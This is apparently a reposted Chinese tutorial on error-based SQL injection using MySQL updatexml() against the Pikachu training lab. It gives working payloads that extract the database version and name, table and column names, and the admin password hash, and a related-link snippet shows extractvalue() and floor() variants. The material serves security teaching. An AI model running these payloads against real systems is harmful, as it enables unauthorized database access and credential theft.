7.1.SQL注入-基于函数报错的方式来利用updatexml()

时间：2024-07-04 21:30:40浏览次数：32

标签：0x7e 获取 7.1 报错 updatexml kobe concat

基于函数报错的方式来进行利用-字符型（本页updatexml()）

前提条件是后台数据库没有屏蔽数据库语法报错信息
在这里插入图片描述

updatexml()方法详解
在这里插入图片描述

注释：
第一个参数，意思就是xml文档的名称
第二个参数，意思就是定位到xml文档中指定的某一个位置的更新
第三个参数，意思就是将文档中指定某一个位置的内容进行替换
基于函数报错的payload语句:updatexml()

kobe' and updatexml(1,version(),0)#

发现报错显示一半’.53’
在这里插入图片描述

~(波浪线转化十六进制为:0x7e)
函数concat()意思为：括号里面的字符串进行拼接,为了将报错显示全面
limit 0,1 意思为：第一个数据为第几个，第二数字为显示多少行
编写payload语句进行爆出数据库版本

kobe' and updatexml(1,concat(0x7e,version()),0)#

爆出数据库版本
在这里插入图片描述

爆出数据库名

kobe' and updatexml(1,concat(0x7e,database()),0)#

显示结果，库名：pikachu
在这里插入图片描述

报错只能一次显示一行

kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu')),0)#

报错结果如下
在这里插入图片描述

可以使用limit一次一次进行获取表名

kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema = 'pikachu' limit 0,1)),0)#

获取users表名
在这里插入图片描述

获取表名之后，在获取列名，思路一致

kobe' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name = 'users' limit 0,1)),0)#

获取出用户名字段
在这里插入图片描述

获取密码字段
在这里插入图片描述

获取到列名称后，在来获取数据

kobe' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#

获取到高级用户权限admin
在这里插入图片描述

再来获取密码

kobe' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0)#

获取密码md5值，可以解析出来密码为：123456
在这里插入图片描述

获取权限完毕

标签：0x7e,获取,7.1,报错,updatexml,kobe,concat
From： https://blog.csdn.net/weixin_46253249/article/details/140011351

7.2.SQL注入-基于函数报错extractvalue(),floor()
注入基于函数报错extractvalue(),floor()-字符型基于extractvalue()爆出数据库版本payload语句：kobe'andextractvalue(0,concat(0x7e,version()))#爆出数据库版本基于floor()floor()函数就是取整数爆出数据版本信息kobe'and(select2from(selectcount(*),......
微调qwen-VL报错ValueError: Unrecognized configuration class＜xxx＞to build an AutoTo
问题在微调qwen-vl的时候，微调完成之后，模型也保存好了，但是用保存的模型进行推理的时候报错，看样子是找不到分词器tokenizer。报错信息ValueError:Unrecognizedconfigurationclass<class‘transformers_modules.configuration_qwen.QWenConfig’>tobuildanAutoTok......
CTF常用sql注入（二）报错注入（普通以及双查询）
0x05报错注入适用于页面无正常回显，但是有报错，那么就可以使用报错注入基础函数floor()向下取整函数返回小于或等于传入参数的最大整数。换句话说，它将数字向下取整到最接近的整数值。示例：floor(3.7)返回3floor(-2.5)返回-3round()四舍五入函数将传入的数字四......
没有使用Redis相关的代码或依赖，但在 `application.yaml` 配置文件中配置了Redis参数，项
个人名片......
bug：node-sass报错
问题：淘宝的npm镜像源https://registry.npm.taobao.org到期，切换到了新镜像源，npmconfigsetregistryhttps://registry.npmmirror.com但是启动老某些老项目的时候，报了node-sass的问题，原因：通过排查发现，原来是有个.npmrc文件配置了老淘宝源而且npm包管理器就算已经通过np......
H3C华三服务器raid报错数据恢复
一、确认RAID状态与硬盘状态检查RAID状态：通过服务器的管理界面或命令行工具检查RAID的状态，确认是RAID配置错误、信息丢失还是硬盘故障导致的RAID报错。检查硬盘状态：检查服务器的所有硬盘的状态，包括健康状况、读写性能等，以确定是否有硬盘出现物理故障或逻辑错误。二、尝试恢......
JAVA每日作业day7.1-7.3小总结
ok了家人们前几天学了一些知识，接下来一起看看吧一.APIJava的API（API:Application(应用)Programming(程序) Interface(接口)）JavaAPI就是JDK中提供给我们使用的类，这些类将底层的代码实现封装了起来，我们不需要关心这些类是如何......
Linux执行./configure时报错
configure:error:noacceptableCcompilerfoundin$PATH上述错误是未安装合适的编译器所导致的报错。sudoyuminstallgcc-c++(使用sudoyuminstallgcc-c++时会自动安装/升级gcc及其他依赖的包。)安装、升级完毕后重新执行以下命令即可！./configuremakemake......
7.1模拟考试心得
T1，一看就看出来了这道题用不到任何算法，直接模拟即可，大概花费了5分钟来读题以及打代码，结果样例WA了，再次阅读题目发现少判断了P与N的情况，然后改了，总的来讲花了10分钟作业T2，通过他给定一个区间想到了前缀和的做法，这样的时间复杂度就大大降低，轻松ACT3，T4这两道题都比较容易没什么......
quartz调度框架和gbase8s适配过程中的四个报错
1.报错Causedby:java,sql.SOLExceptionCreatebreakpoint.:发生语法错误。程序与数据库通过jdbc连接时，为了保持连接，会向数据库发送sql语句验证连接有效--如mysql的其他数据库connection-test-query:"select1;"--gbase8s数据库需要修改connection-test-query:"sel......

7.1.SQL注入-基于函数报错的方式来利用updatexml()

基于函数报错的方式来进行利用-字符型（本页updatexml()）

相关文章

赞助商

阅读排行